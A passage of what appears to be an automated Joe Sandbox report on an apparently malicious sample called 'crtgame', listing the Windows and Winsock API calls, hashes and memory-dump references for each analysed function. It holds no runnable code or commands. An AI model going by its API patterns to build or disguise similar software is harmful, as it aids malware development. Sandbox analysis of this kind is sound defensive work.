                                                                                                            • Opcode Fuzzy Hash: deb79ec463c27fabd3ff090995f525688e5d211fef671b95d72c82c7a0c4b342
                                                                                                            • Instruction Fuzzy Hash: 93513BB1D04258DFDB15DFA8C484AEEFFB5AF48314F14816AE906AB351DB309A08CF60
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
                                                                                                            • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C
                                                                                                              • Part of subcall function 02C29EA8: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Send
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282938840-0
                                                                                                            • Opcode ID: bfc32409c5c4e7b34c49534200ce394b56c404449ddb9306b4e35e9164c13d57
                                                                                                            • Instruction ID: 8fd4b11fa309e4efb42e7ffa72635523c7294beab25bcda9ec9a127fccc26fb6
                                                                                                            • Opcode Fuzzy Hash: bfc32409c5c4e7b34c49534200ce394b56c404449ddb9306b4e35e9164c13d57
                                                                                                            • Instruction Fuzzy Hash: B8017977500215EFD7205F55984456BB6EDFF45750B10096EF89983200EB709D05DBA1
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,00000000,?,02C27545,?,02C57454,02C57454,?,?,02C57454,00000000,000007E7), ref: 02C27DA6
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 02C27DAF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastshutdown
                                                                                                            • String ID:
                                                                                                            • API String ID: 1920494066-0
                                                                                                            • Opcode ID: 2d07c065c805c85800675b688ffca8dba3415f5f5164d9089073cd6028c14f9a
                                                                                                            • Instruction ID: 21c15d28525fadcc0db87008fe98a7176be06cceee14c25141626d0de0c47a82
                                                                                                            • Opcode Fuzzy Hash: 2d07c065c805c85800675b688ffca8dba3415f5f5164d9089073cd6028c14f9a
                                                                                                            • Instruction Fuzzy Hash: FBF06777A003258FC720AF68D514B6AB7E5EF48320F10499CED9597380DB30AC14CBA1
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25D0D
                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C25D14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 1769507746-0
                                                                                                            • Opcode ID: 437637194fa2e582649cf81925fd403188a4c40b58122b0cd93b61c2eba63175
                                                                                                            • Instruction ID: 6392d44ff3472965098521152aadbf7808ff4732d748a308343693babdaa22c0
                                                                                                            • Opcode Fuzzy Hash: 437637194fa2e582649cf81925fd403188a4c40b58122b0cd93b61c2eba63175
                                                                                                            • Instruction Fuzzy Hash: 0AE0D839A415249B8B159F65E1880DFFB75FF86231BC401CAD50947214CB39556D87C5
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C25049
                                                                                                              • Part of subcall function 02C23D7E: htons.WS2_32(?), ref: 02C23DA2
                                                                                                              • Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DB9
                                                                                                              • Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: htonl$H_prologhtons
                                                                                                            • String ID:
                                                                                                            • API String ID: 4039807196-0
                                                                                                            • Opcode ID: 3240c32edf8a03ec101bf779cbf5ec9b52b987c43105635d146d280aa3649c55
                                                                                                            • Instruction ID: 918b553b05a1f921cbcc5132c0690eb298a366570b96cb17d3d49489008f40e4
                                                                                                            • Opcode Fuzzy Hash: 3240c32edf8a03ec101bf779cbf5ec9b52b987c43105635d146d280aa3649c55
                                                                                                            • Instruction Fuzzy Hash: E2814C75D0025EDECF09DFA8D5806EEBBB5EF48310F14815AD815B7280EB365A49CFA4
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2E365
                                                                                                              • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prologValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3700342317-0
                                                                                                            • Opcode ID: e1a7dcf352f144ecd66f7b1e3c63608e4c658d69f797218c36bde29c30edfd3e
                                                                                                            • Instruction ID: d1cb4ad96f2cf25d295f87a0ab160bcf012e5deaf0487a560e1a15830cce1579
                                                                                                            • Opcode Fuzzy Hash: e1a7dcf352f144ecd66f7b1e3c63608e4c658d69f797218c36bde29c30edfd3e
                                                                                                            • Instruction Fuzzy Hash: 122133B2904219AFDB04DF95D540AEFBBF9FF48311F14411EE908E7240DB71A904DBA1
                                                                                                            APIs
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C233CC
                                                                                                              • Part of subcall function 02C232AB: __EH_prolog.LIBCMT ref: 02C232B0
                                                                                                              • Part of subcall function 02C232AB: RtlEnterCriticalSection.NTDLL(?), ref: 02C232C3
                                                                                                              • Part of subcall function 02C232AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C232EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 1518410164-0
                                                                                                            • Opcode ID: 037ac45e0582e41718e11ba5c0801b7d6bb9f605c26f2f63663a9b798439dd13
                                                                                                            • Instruction ID: adb526ed5bbd01a5d3ebe2789c010903331fbd02228c162396d34d4d7792041d
                                                                                                            • Opcode Fuzzy Hash: 037ac45e0582e41718e11ba5c0801b7d6bb9f605c26f2f63663a9b798439dd13
                                                                                                            • Instruction Fuzzy Hash: 86019270214616AFD708DF59D885F55FBA9FF84320B10835AE928872C0EF70E925CBA0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 8f753af6b35742c44bab170ecc561df0315d910a76e1762a92a0620755078c9c
                                                                                                            • Instruction ID: b2afb38e16b5a32f2d26632d6aef0fd0db947c77f88ebfa62222c4d393a84740
                                                                                                            • Opcode Fuzzy Hash: 8f753af6b35742c44bab170ecc561df0315d910a76e1762a92a0620755078c9c
                                                                                                            • Instruction Fuzzy Hash: 68F014B140C7089BD3127F0AD88937AB7E4AB44701F41482CD6C203601EA31A8048A9B
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2DEF5
                                                                                                              • Part of subcall function 02C226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                                                                              • Part of subcall function 02C226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                                                                              • Part of subcall function 02C226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45583), ref: 02C22738
                                                                                                              • Part of subcall function 02C226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                                                                              • Part of subcall function 02C226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 4293676635-0
                                                                                                            • Opcode ID: 582e1501677389c53df2e8096caecc0919ea9b2436e8d1f8db5d1ff154135e8d
                                                                                                            • Instruction ID: 411ecc0c7a439bb0d46cb6be0e75248094df074f24c8ac271ee70ea2e1f93395
                                                                                                            • Opcode Fuzzy Hash: 582e1501677389c53df2e8096caecc0919ea9b2436e8d1f8db5d1ff154135e8d
                                                                                                            • Instruction Fuzzy Hash: 4D01D0B1900B048FC328CF0AC640946FFF5FF88710B11C5AE944A8B721EB70AA40CF94
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: b7e48c3b9bbb5f9db7811adea5cabdf83f405578bdd43423ad6698c7d77a596f
                                                                                                            • Instruction ID: 718f42e02828f173762738c91453b091cbf49efc448bdd3c8bf09a1aa4c66ecb
                                                                                                            • Opcode Fuzzy Hash: b7e48c3b9bbb5f9db7811adea5cabdf83f405578bdd43423ad6698c7d77a596f
                                                                                                            • Instruction Fuzzy Hash: 57E04FF290C6149FE7117A589C417BDB7D4DF04220F06453DD7C893640E536540086CB
                                                                                                            APIs
                                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02C7B90E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderPathSpecial
                                                                                                            • String ID:
                                                                                                            • API String ID: 994120019-0
                                                                                                            • Opcode ID: de9bfb89cb552b2d5cef18ff0eb21b0a516178cd92495e5fa954be3285fbba33
                                                                                                            • Instruction ID: 901a4288b203b0d02900da4319a64d7152bcdbc8e7a0a137f9367ddcd21da56f
                                                                                                            • Opcode Fuzzy Hash: de9bfb89cb552b2d5cef18ff0eb21b0a516178cd92495e5fa954be3285fbba33
                                                                                                            • Instruction Fuzzy Hash: EEE01AB054C70CCFE3107EA9DC8A32AB7A4AB14701F05081DC7E203241FA316A14DA9B
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C2DCD4
                                                                                                              • Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585
                                                                                                              • Part of subcall function 02C2DEF0: __EH_prolog.LIBCMT ref: 02C2DEF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4254904621-0
                                                                                                            • Opcode ID: d2a4cbf19f52a8b089827d57d85c3257517afc7cf4cd8be5f9ee2148d3da3c03
                                                                                                            • Instruction ID: 12fd8d3479e42d74bf24f4b85ac1d45c104a8045dea3f76b43c7437f23624dc9
                                                                                                            • Opcode Fuzzy Hash: d2a4cbf19f52a8b089827d57d85c3257517afc7cf4cd8be5f9ee2148d3da3c03
                                                                                                            • Instruction Fuzzy Hash: 1FE0C271A00185AFDF0DDFA8D80076FB7A2EB54300F1046AEB80AE7640DF718A009A81
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C3567A: __getptd_noexit.LIBCMT ref: 02C3567B
                                                                                                              • Part of subcall function 02C3567A: __amsg_exit.LIBCMT ref: 02C35688
                                                                                                              • Part of subcall function 02C32EB3: __getptd_noexit.LIBCMT ref: 02C32EB7
                                                                                                              • Part of subcall function 02C32EB3: __freeptd.LIBCMT ref: 02C32ED1
                                                                                                              • Part of subcall function 02C32EB3: RtlExitUserThread.NTDLL(?,00000000,?,02C32E93,00000000), ref: 02C32EDA
                                                                                                            • __XcptFilter.LIBCMT ref: 02C32E9F
                                                                                                              • Part of subcall function 02C387B4: __getptd_noexit.LIBCMT ref: 02C387B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                            • String ID:
                                                                                                            • API String ID: 1405322794-0
                                                                                                            • Opcode ID: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
                                                                                                            • Instruction ID: a3fd409390737941a9157d7d24005512f0bbec815e659a895d26a879099b9999
                                                                                                            • Opcode Fuzzy Hash: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
                                                                                                            • Instruction Fuzzy Hash: 16E0ECB2904600AFEB09BBA0D949F2D77B6AF05701F200949F5019B2A0DAB5AD40AE21
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C31030: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310D0
                                                                                                              • Part of subcall function 02C31030: CloseHandle.KERNEL32(00000000), ref: 02C310E5
                                                                                                              • Part of subcall function 02C31030: ResetEvent.KERNEL32(00000000), ref: 02C310EF
                                                                                                              • Part of subcall function 02C31030: CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C31124
                                                                                                            • TlsSetValue.KERNEL32(00000025,?), ref: 02C31BCA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1556185888-0
                                                                                                            • Opcode ID: c6cb7f355cc83f313d6a4b7163cc6ac8e82e3f4d98281130e7c1db7643f1667b
                                                                                                            • Instruction ID: cf60fd443e0a2027cdd2652142e828f63c519779d1f531f563001777706a4a52
                                                                                                            • Opcode Fuzzy Hash: c6cb7f355cc83f313d6a4b7163cc6ac8e82e3f4d98281130e7c1db7643f1667b
                                                                                                            • Instruction Fuzzy Hash: 9B018F72A40254AFD700CF59D845B5ABBACFB457B0F144B6AF829E3680D771A9008AA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C29478: __EH_prolog.LIBCMT ref: 02C2947D
                                                                                                              • Part of subcall function 02C29478: _Allocate.LIBCPMT ref: 02C294D4
                                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C303C2
                                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C303CA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage
                                                                                                            • String ID: Unknown error$invalid string position
                                                                                                            • API String ID: 58466617-1837348584
                                                                                                            • Opcode ID: b3b5e5c5ee0e12836384cb3c63e26baf954432bd95cc41789f13266d20dce060
                                                                                                            • Instruction ID: e5f9917c7c714776d6fcf94cd75ce433edcaf4470d1a9e063bf660f768c19b7f
                                                                                                            • Opcode Fuzzy Hash: b3b5e5c5ee0e12836384cb3c63e26baf954432bd95cc41789f13266d20dce060
                                                                                                            • Instruction Fuzzy Hash: 7751CB71608341CFE715CF24C880B2FBBE4AB88358F500D2DF48697292DB71E688CB92
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C348B6,?,?,?,00000001), ref: 02C38F4D
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C38F56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
                                                                                                            • Instruction ID: c32ced0ff370891aeafe4db2ac49568fab965ce044387a600010bb3a32f72d7f
                                                                                                            • Opcode Fuzzy Hash: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
                                                                                                            • Instruction Fuzzy Hash: C0B09239486208EBCB012F91FC0DB8ABFA8EB04662F004950F60E440618B7264289AE2
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C224E6
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C224FC
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C2250E
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2256D
                                                                                                            • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02C2257F
                                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02C22599
                                                                                                            • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C225A2
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C225F0
                                                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02C2262F
                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C2268E
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C22699
                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C226AD
                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02C226BD
                                                                                                            • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C226C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 1213838671-0
                                                                                                            • Opcode ID: 19a4c68a77857c2b70c5eb674214b8fc2d5b259b456b05f3ce3a24e7c541e5b4
                                                                                                            • Instruction ID: f3d3af1340656109ffe743dfca3878847bb4f33b243cc7ef3b7e9d0fc832e2c7
                                                                                                            • Opcode Fuzzy Hash: 19a4c68a77857c2b70c5eb674214b8fc2d5b259b456b05f3ce3a24e7c541e5b4
                                                                                                            • Instruction Fuzzy Hash: 80613376901219DFCB21DFA4D584AAEFBF9FF48310F104569E946E3240DB34AA58CFA1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C24533
                                                                                                              • Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585
                                                                                                            • htons.WS2_32(?), ref: 02C24594
                                                                                                            • htonl.WS2_32(?), ref: 02C245B7
                                                                                                            • htonl.WS2_32(00000000), ref: 02C245BE
                                                                                                            • htons.WS2_32(00000000), ref: 02C24672
                                                                                                            • _sprintf.LIBCMT ref: 02C24688
                                                                                                            • htons.WS2_32(?), ref: 02C245DB
                                                                                                              • Part of subcall function 02C290D6: __EH_prolog.LIBCMT ref: 02C290DB
                                                                                                              • Part of subcall function 02C290D6: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C29156
                                                                                                              • Part of subcall function 02C290D6: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C29174
                                                                                                              • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                                              • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                                              • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                                              • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                                              • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                                              • Part of subcall function 02C2D892: __EH_prolog.LIBCMT ref: 02C2D897
                                                                                                            • htonl.WS2_32(?), ref: 02C248A7
                                                                                                            • htonl.WS2_32(00000000), ref: 02C248AE
                                                                                                            • htonl.WS2_32(00000000), ref: 02C248F3
                                                                                                            • htonl.WS2_32(00000000), ref: 02C248FA
                                                                                                            • htons.WS2_32(?), ref: 02C2491A
                                                                                                            • htons.WS2_32(?), ref: 02C24924
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 725951905-0
                                                                                                            • Opcode ID: 73eb9d2a346a609f2aebfd41f96e8d771b7265d76c351a1b545ffb7676c24cf7
                                                                                                            • Instruction ID: 7177abb7e287af50bb4b4454ebfc23f6517f3bcb4bb96bebe24c988b31e1d1fe
                                                                                                            • Opcode Fuzzy Hash: 73eb9d2a346a609f2aebfd41f96e8d771b7265d76c351a1b545ffb7676c24cf7
                                                                                                            • Instruction Fuzzy Hash: 59023971D00269EFDF25DFA4D844BEEBBB9AF08304F10459AE505B7280DBB45A48DFA1
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C23428
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C2346B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C23472
                                                                                                            • GetLastError.KERNEL32 ref: 02C23486
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C234D7
                                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C234ED
                                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C23518
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                                            • API String ID: 2902213904-434325024
                                                                                                            • Opcode ID: 1ceff6280f2335611674401108800bf0217ad51a370f6e29af17d40061554b77
                                                                                                            • Instruction ID: 31198c0bb4d770b77e14417e8ac55a9f15d79ef96f3d9e18fbbb5f6f229e385d
                                                                                                            • Opcode Fuzzy Hash: 1ceff6280f2335611674401108800bf0217ad51a370f6e29af17d40061554b77
                                                                                                            • Instruction Fuzzy Hash: EF318FB6900355DFDB119F64D84476ABBF9FF88311F0089EAE8059B240DB74D905CFA1
                                                                                                            APIs
                                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310D0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C310E5
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 02C310EF
                                                                                                            • CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C31124
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AC2FC4E2), ref: 02C3119A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C311AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1285874450-0
                                                                                                            • Opcode ID: e4605e9ed5b29351420202531ae161e9f7fd791d27e30f06d1ace3d5fa895f9c
                                                                                                            • Instruction ID: d70c83c7de9c3ff87e1ffd4a5a94bdf258aa40558719ae843b66006fcf13cf78
                                                                                                            • Opcode Fuzzy Hash: e4605e9ed5b29351420202531ae161e9f7fd791d27e30f06d1ace3d5fa895f9c
                                                                                                            • Instruction Fuzzy Hash: DC414E74D00358AFDF21CFE5CC44BAEB7B8AF45724F184A19E819EB280D7B49A05CB91
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C220AC
                                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C220CD
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C220D8
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02C2213E
                                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C2217A
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02C22187
                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221A6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                            • String ID:
                                                                                                            • API String ID: 1171374749-0
                                                                                                            • Opcode ID: ecb4be55c0c696e197b0fa1b3244cb6a0a28c41c7a67f1286016f0074981aee7
                                                                                                            • Instruction ID: 7a7708d6a5f3db75509fc650797d3cd4a170d4b3cec63078299299aa0c1c9c6d
                                                                                                            • Opcode Fuzzy Hash: ecb4be55c0c696e197b0fa1b3244cb6a0a28c41c7a67f1286016f0074981aee7
                                                                                                            • Instruction Fuzzy Hash: 764128755047119FC321DF25D884A6BBBF9FFD8654F004A1EF89682650DB30EA09CFA2
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C318F0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C3114E,?,?), ref: 02C3191F
